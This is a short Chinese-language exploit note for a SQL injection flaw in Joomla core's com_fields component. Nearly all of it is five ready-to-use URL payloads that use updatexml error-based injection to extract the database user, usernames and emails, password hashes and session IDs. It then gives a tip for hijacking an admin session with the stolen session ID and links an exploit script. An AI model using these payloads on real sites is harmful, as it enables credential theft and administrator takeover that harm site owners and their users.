joomla core注入漏洞
注入语句如下:
payload1 = '/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,user()),1)'
payload2 = '/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select concat(username,0x3a,email) from %23__users limit 1)),1)'
payload3 = '/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select left(password,30) from %23__users limit 1)),1)'
payload4 = 'index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select right(password,30) from %23__users limit 1)),1)'
payload5 = '/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select session_id from %23__session where username in (select username from %23__users))),1)'
访问后台使用firebug更改即可,记得加上用户名
今天下午写的利用脚本:
https://github.com/222222amor/exp_notes/blob/master/joomla_core_sqli.py